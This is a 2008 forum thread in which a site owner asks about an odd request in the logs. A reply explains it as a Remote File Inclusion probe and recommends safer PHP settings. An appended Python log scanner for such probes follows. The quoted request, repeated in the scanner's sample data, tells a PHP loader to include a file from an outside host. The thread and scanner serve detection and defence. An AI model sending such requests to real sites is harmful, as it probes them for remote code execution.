Author Topic: lansites.ru/language/lang_english/test.txt ??  (Read 16439 times)

November 10, 2008, 10:55:36 pm

sLaV

Hi,

Looking through our server logs we noticed somebody tried viewing the following page on our site:
/index.php?autoLoadConfig[333][0][autoType]=include&autoLoadConfig[333][0][loadFile]=http://lansites.ru//language/lang_english/test.txt???

I can't seem to find any info on this test.txt file anywhere. I just noticed it in your malware domain list ... I checked our server and there are no new files injected on our site that I can see ... checked the index.php file and no script has been injected ... have no idea what they're trying to do here ... anybody have any further info on this?? Should we be worried??


Cheers

November 10, 2008, 11:22:28 pm
Reply #1

philipp

hi sLaV,
what you see in your logs is an RFI attempt (Remote File Inclusion: http://en.wikipedia.org/wiki/Remote_File_Inclusion). That means someone is just probing your web-application for a possible vulnerability. This does not mean you are vulnerable!
All this script does is check whether RFI is possible for this script and whether the safe_mode setting in your PHP configuration is enabled or disabled.

no need to worry :)

regards,
philipp

November 10, 2008, 11:33:47 pm
Reply #2

sLaV

Hi philipp,

Thank you kindly for getting back to us so quickly ... I checked our server info and it looks like safe mode is turned off, register_globals is on and allow_url_fopen is on ... should we be contacting our host to change any of these settings? I just don't know what they're capable of from here ...


Cheers

November 10, 2008, 11:47:42 pm
Reply #3

philipp

sLaV,
it all depends on your web-applications' requirements. as long as those are secure you won't have to worry.
ideally, these settings should be set to
safe_mode on
register_globals off
allow_url_fopen off

but as stated above, it all depends on how secure your php code is and what it depends/relies on. also, some of those settings can also be changed in local .htaccess files afaik.
read more here:
http://www.owasp.org/index.php/PHP_Top_5
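
Added example, not part of the thread and not any poster's code: a Python sketch that picks requests like the one in the first post out of an access log by flagging query parameters whose value is a remote URL, including double-encoded ones. It assumes combined log format; the client addresses, timestamps, status codes, the last three log lines and the hosts `remote.example` and `www.example.com` are constructed.

```python
import re
from urllib.parse import parse_qsl, unquote

# Client address and request target of a combined-format access log entry
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# A parameter value that is itself a remote URL; group 1 is the authority part
REMOTE_URL_RE = re.compile(r'^\s*(?:https?|ftps?)://([^/?#\s]+)', re.I)

# Constructed sample: line 1 carries the request quoted in the first post
SAMPLE_LOG = [
    '192.0.2.10 - - [10/Nov/2008:22:41:07 +0000] "GET /index.php?autoLoadConfig[333][0][autoType]=include&autoLoadConfig[333][0][loadFile]=http://lansites.ru//language/lang_english/test.txt??? HTTP/1.1" 200 5120',
    '192.0.2.11 - - [10/Nov/2008:22:43:19 +0000] "GET /index.php?page=http%253A%252F%252Fremote.example%252Fx.txt HTTP/1.1" 404 312',
    '198.51.100.7 - - [10/Nov/2008:22:44:02 +0000] "GET /login.php?next=http://www.example.com/account HTTP/1.1" 302 0',
    '198.51.100.8 - - [10/Nov/2008:22:45:30 +0000] "GET /index.php?page=news&id=4 HTTP/1.1" 200 7301',
]

def find_rfi_probes(log_lines, own_hosts=()):
    """Return (client, parameter, remote_host) for each URL-valued parameter."""
    own = {h.lower() for h in own_hosts}
    hits = []
    for line in log_lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a request line we understand
        client, target = m.groups()
        _path, _, query = target.partition("?")
        for name, value in parse_qsl(query, keep_blank_values=True):
            # parse_qsl decoded once; decode again to catch double encoding
            url = REMOTE_URL_RE.match(unquote(value))
            if not url:
                continue
            # Drop any userinfo and port so only the host name is compared
            host = url.group(1).rsplit("@", 1)[-1].split(":", 1)[0].lower()
            if host not in own:  # links back to our own site are not probes
                hits.append((client, name, host))
    return hits

if __name__ == "__main__":
    for hit in find_rfi_probes(SAMPLE_LOG, own_hosts=("www.example.com",)):
        print(hit)
```

A hit only shows that a request was made; whether the application is affected depends on the PHP code and settings discussed in the replies above.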